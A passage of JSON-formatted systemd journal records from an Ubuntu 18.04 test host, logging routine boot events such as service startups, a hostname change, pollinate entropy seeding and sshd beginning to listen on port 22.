"/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice system-getty.slice.", "UNIT" : "system-getty.slice", "INVOCATION_ID" : "125f02b327ec465b96e4c10b0e9ba337", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818470911" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32c;b=e2b08827b5804427b422c10c84f1567e;m=2a63e65;t=5bd16df69bdcd;x=aef5fe72952f47d", "__REALTIME_TIMESTAMP" : "1615280818732493", "__MONOTONIC_TIMESTAMP" : "44449381", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Getty on tty1.", "UNIT" : "getty@tty1.service", "INVOCATION_ID" : "8b46541929ef4e8aadfe0703f2a81028", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818480081" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32d;b=e2b08827b5804427b422c10c84f1567e;m=2a63ebb;t=5bd16df69be22;x=6b1b08f772d95efd", "__REALTIME_TIMESTAMP" : "1615280818732578", "__MONOTONIC_TIMESTAMP" : "44449467", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Login Prompts.", "UNIT" : "getty.target", "INVOCATION_ID" : "e1ddb495fc2f4c12b84162798cccd2bb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818484008" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32e;b=e2b08827b5804427b422c10c84f1567e;m=2a644a6;t=5bd16df69c40e;x=8ac4ec612bb0b149", "__REALTIME_TIMESTAMP" : "1615280818734094", "__MONOTONIC_TIMESTAMP" : 
"44450982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "MESSAGE" : "Started LSB: Record successful boot for GRUB.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818497851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32f;b=e2b08827b5804427b422c10c84f1567e;m=2a64531;t=5bd16df69c498;x=537110d2c3197afd", "__REALTIME_TIMESTAMP" : "1615280818734232", "__MONOTONIC_TIMESTAMP" : "44451121", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "MESSAGE" : "Started LSB: automatic crash report generation.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280818508165" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=330;b=e2b08827b5804427b422c10c84f1567e;m=2a64594;t=5bd16df69c4fb;x=c27d5488bc1c525f", "__REALTIME_TIMESTAMP" : "1615280818734331", "__MONOTONIC_TIMESTAMP" : "44451220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "MESSAGE" : "Started Authorization Manager.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552924" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=331;b=e2b08827b5804427b422c10c84f1567e;m=2a645de;t=5bd16df69c545;x=e5031d2cf2fb0f22", "__REALTIME_TIMESTAMP" : "1615280818734405", "__MONOTONIC_TIMESTAMP" : "44451294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", 
"JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "MESSAGE" : "Started Accounts Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818557033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=332;b=e2b08827b5804427b422c10c84f1567e;m=2a64624;t=5bd16df69c58c;x=10c48f30b9fda882", "__REALTIME_TIMESTAMP" : "1615280818734476", "__MONOTONIC_TIMESTAMP" : "44451364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "MESSAGE" : "Started Hostname Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634669" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=333;b=e2b08827b5804427b422c10c84f1567e;m=2a64671;t=5bd16df69c5d9;x=8b8d263511ef7d30", "__REALTIME_TIMESTAMP" : "1615280818734553", "__MONOTONIC_TIMESTAMP" : "44451441", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/hostname/hostnamed.c", "CODE_LINE" : "483", "CODE_FUNC" : 
"method_set_hostname", "SYSLOG_IDENTIFIER" : "systemd-hostnamed", "MESSAGE" : "Changed host name to 'host-192-168-10-95'", "_PID" : "827", "_COMM" : "systemd-hostnam", "_EXE" : "/lib/systemd/systemd-hostnamed", "_CMDLINE" : "/lib/systemd/systemd-hostnamed", "_CAP_EFFECTIVE" : "200000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-hostnamed.service", "_SYSTEMD_UNIT" : "systemd-hostnamed.service", "_SYSTEMD_INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818700892" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=334;b=e2b08827b5804427b422c10c84f1567e;m=2a95fca;t=5bd16df6cdf31;x=82aea42c373bff27", "__REALTIME_TIMESTAMP" : "1615280818937649", "__MONOTONIC_TIMESTAMP" : "44654538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "MESSAGE" : "No valid path found for iwconfig", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=335;b=e2b08827b5804427b422c10c84f1567e;m=2a9702b;t=5bd16df6cef93;x=613965ac6fdc269a", "__REALTIME_TIMESTAMP" : "1615280818941843", "__MONOTONIC_TIMESTAMP" : "44658731", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : 
"system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "No valid path found for iw" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=336;b=e2b08827b5804427b422c10c84f1567e;m=2aa0b15;t=5bd16df6d8a7d;x=a341e91927040427", "__REALTIME_TIMESTAMP" : "1615280818981501", "__MONOTONIC_TIMESTAMP" : "44698389", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "Started Dispatcher daemon for systemd-networkd.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818978129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=337;b=e2b08827b5804427b422c10c84f1567e;m=2aac31b;t=5bd16df6e4282;x=2b8e71bb2b69ee26", "__REALTIME_TIMESTAMP" : "1615280819028610", "__MONOTONIC_TIMESTAMP" : "44745499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" 
: "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "MESSAGE" : "AppArmor status: apparmor is enabled and all features are available", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=338;b=e2b08827b5804427b422c10c84f1567e;m=2ae32b7;t=5bd16df71b21f;x=cf28ad7faf15f310", "__REALTIME_TIMESTAMP" : "1615280819253791", "__MONOTONIC_TIMESTAMP" : "44970679", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "MESSAGE" : "client verified challenge/response with [https://entropy.ubuntu.com/]", "_PID" : "901", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_CMDLINE" : "logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819253685" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=339;b=e2b08827b5804427b422c10c84f1567e;m=2ae7e71;t=5bd16df71fdd8;x=e62c3f540e40b1a0", "__REALTIME_TIMESTAMP" : "1615280819273176", "__MONOTONIC_TIMESTAMP" : "44990065", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client hashed response from [https://entropy.ubuntu.com/]", "_PID" : "909", "_CMDLINE" : "logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819273149" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33a;b=e2b08827b5804427b422c10c84f1567e;m=2ae93e9;t=5bd16df721350;x=37ab24b8f1ef2da3", "__REALTIME_TIMESTAMP" : "1615280819278672", "__MONOTONIC_TIMESTAMP" : "44995561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "MESSAGE" : "Started LXD - container startup/shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819276209" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33b;b=e2b08827b5804427b422c10c84f1567e;m=2ae9eec;t=5bd16df721e53;x=c7bc168b61122055", "__REALTIME_TIMESTAMP" : "1615280819281491", "__MONOTONIC_TIMESTAMP" : "44998380", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client successfully seeded [/dev/urandom]", "_PID" : "910", "_CMDLINE" : "logger --id=787 -t pollinate client successfully seeded [/dev/urandom]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819281481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33c;b=e2b08827b5804427b422c10c84f1567e;m=2aeaaea;t=5bd16df722a51;x=69130601c522a0a9", "__REALTIME_TIMESTAMP" : "1615280819284561", "__MONOTONIC_TIMESTAMP" : "45001450", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "helpers.go:145: error trying to compare the snap system key: system-key missing on disk" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33d;b=e2b08827b5804427b422c10c84f1567e;m=2aec53e;t=5bd16df7244a6;x=cc7837c983afc749", "__REALTIME_TIMESTAMP" : "1615280819291302", "__MONOTONIC_TIMESTAMP" : "45008190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "Started Pollinate to seed the pseudo random number generator.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819287852" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33e;b=e2b08827b5804427b422c10c84f1567e;m=2aef68d;t=5bd16df7275f4;x=2f8d56aa93754fe9", "__REALTIME_TIMESTAMP" : "1615280819303924", "__MONOTONIC_TIMESTAMP" : "45020813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", 
"_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting OpenBSD Secure Shell server...", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819300793" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33f;b=e2b08827b5804427b422c10c84f1567e;m=2af6720;t=5bd16df72e686;x=75277391dc9d1904", "__REALTIME_TIMESTAMP" : "1615280819332742", "__MONOTONIC_TIMESTAMP" : "45049632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:338: started snapd/2.40+18.04 (series 16; classic) ubuntu/18.04 (amd64) linux/4.15.0-60-generic." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=340;b=e2b08827b5804427b422c10c84f1567e;m=2b00b96;t=5bd16df738afe;x=bca15ef339dacb2e", "__REALTIME_TIMESTAMP" : "1615280819374846", "__MONOTONIC_TIMESTAMP" : "45091734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "MESSAGE" : "Server listening on 0.0.0.0 port 22.", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819374819" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=341;b=e2b08827b5804427b422c10c84f1567e;m=2b00d9c;t=5bd16df738d03;x=487ff0bcc8930184", "__REALTIME_TIMESTAMP" : "1615280819375363", "__MONOTONIC_TIMESTAMP" : "45092252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", 